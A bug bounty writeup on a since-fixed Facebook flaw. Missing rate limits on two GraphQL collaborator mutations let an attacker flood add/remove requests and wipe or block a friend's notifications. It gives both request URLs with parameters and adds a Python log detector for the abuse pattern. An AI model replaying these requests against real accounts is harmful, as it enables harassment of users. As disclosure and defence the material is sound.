[Facebook] Deleting Friends Notifications and preventing new Notifications
By exploiting missing rate limits on two GraphQL mutation requests and performing the attack in a particular manner, it was possible to delete any friend's notifications and even prevent new ones from coming in.
Similar issue reported by me - click here
POC -
Rate Limit Evaluation -
Both requests could be sent with more than 4000 payloads, which took less than a minute.
There was no silent blocking: after the 3000th payload the victim was still hung and the response still reported success. The response length didn't differ throughout the brute-force attack.
Both requests should be made simultaneously.
Request 1 -
https://developers.facebook.com/tools/explorer/?method=POST&path=graphql&version=v3.2&doc_id=2501557149952408&variables={"input":{"client_mutation_id":"10","actor_id":"XXX","participant_ids":["XXX"],"content_collection_id":"XXX","role":"CONTRIBUTOR","save_mechanism":"ADD_BUTTON","save_surface":"SAVE_LIST_COLLABORATORS_ADD_VIEW"},"scale":1,"useCase":"SAVE_DEFAULT"}
Request 2 -
https://developers.facebook.com/tools/explorer/?method=POST&path=graphql&version=v3.2&doc_id=3163221407084978&variables={"input":{"client_mutation_id":"11","actor_id":"XXX","content_collection_id":"2157516397876473","save_mechanism":"REMOVE_FROM_SAVED_LIST_BUTTON","participant_ids":["XXX"],"save_surface":"SAVE_LIST_COLLABORATORS_VIEW"},"scale":1,"useCase":"SAVE_DEFAULT"}
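Since the responses above stayed identical in status and length across thousands of calls, the abuse is only visible in request volume. The following is an added example (not part of this writeup or Facebook's code) of a server-side sliding-window detector that flags one actor repeatedly firing the add/remove collaborator mutations at the same participant; the log format, the window and the threshold are assumptions, and only the two doc_ids come from the writeup.

```python
# Added example: sliding-window abuse detector for the two collaborator mutations.
# Log format is constructed: "<epoch seconds> <doc_id> <json GraphQL variables>".
import json
from collections import defaultdict, deque

ADD_DOC_ID = "2501557149952408"     # add-collaborator mutation (from the writeup)
REMOVE_DOC_ID = "3163221407084978"  # remove-collaborator mutation (from the writeup)
WINDOW_SECONDS = 60                 # assumed window
MAX_MUTATIONS_PER_WINDOW = 20       # assumed per-(actor, participant) limit


def parse_line(line):
    """Split a constructed log line into (timestamp, doc_id, actor_id, participant_ids)."""
    ts, doc_id, raw = line.split(" ", 2)
    inp = json.loads(raw)["input"]
    return int(ts), doc_id, inp["actor_id"], tuple(inp["participant_ids"])


def find_abusers(lines):
    """Return the (actor, participant) pairs that exceed the mutation limit in any window."""
    windows = defaultdict(deque)  # (actor, participant) -> timestamps inside the window
    flagged = set()
    for line in lines:
        ts, doc_id, actor, participants = parse_line(line)
        if doc_id not in (ADD_DOC_ID, REMOVE_DOC_ID):
            continue  # other mutations are not part of this pattern
        for p in participants:
            q = windows[(actor, p)]
            q.append(ts)
            while q and ts - q[0] > WINDOW_SECONDS:
                q.popleft()  # drop events that fell out of the sliding window
            if len(q) > MAX_MUTATIONS_PER_WINDOW:
                flagged.add((actor, p))
    return flagged


def make_sample_log():
    """Constructed sample: actor 1001 alternates add/remove against participant 1002
    once per second for 30 s (the pattern from the writeup); actor 2001 adds 2002 once."""
    lines = []
    for t in range(30):
        doc_id = ADD_DOC_ID if t % 2 == 0 else REMOVE_DOC_ID
        variables = {"input": {"actor_id": "1001", "participant_ids": ["1002"],
                               "content_collection_id": "COLLECTION_ID_PLACEHOLDER"}}
        lines.append(f"{t} {doc_id} {json.dumps(variables)}")
    benign = {"input": {"actor_id": "2001", "participant_ids": ["2002"],
                        "content_collection_id": "COLLECTION_ID_PLACEHOLDER"}}
    lines.append(f"31 {ADD_DOC_ID} {json.dumps(benign)}")
    return lines


if __name__ == "__main__":
    print(find_abusers(make_sample_log()))  # {('1001', '1002')}
```

The same counter, applied before the mutation executes rather than over logs, is the rate limit whose absence the writeup describes.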
Timeline -
Reported - Friday, January 3, 2020
Triaged - Friday, January 17, 2020
Rewarded - Wednesday, February 19, 2020
Fixed - Tuesday, March 31, 2020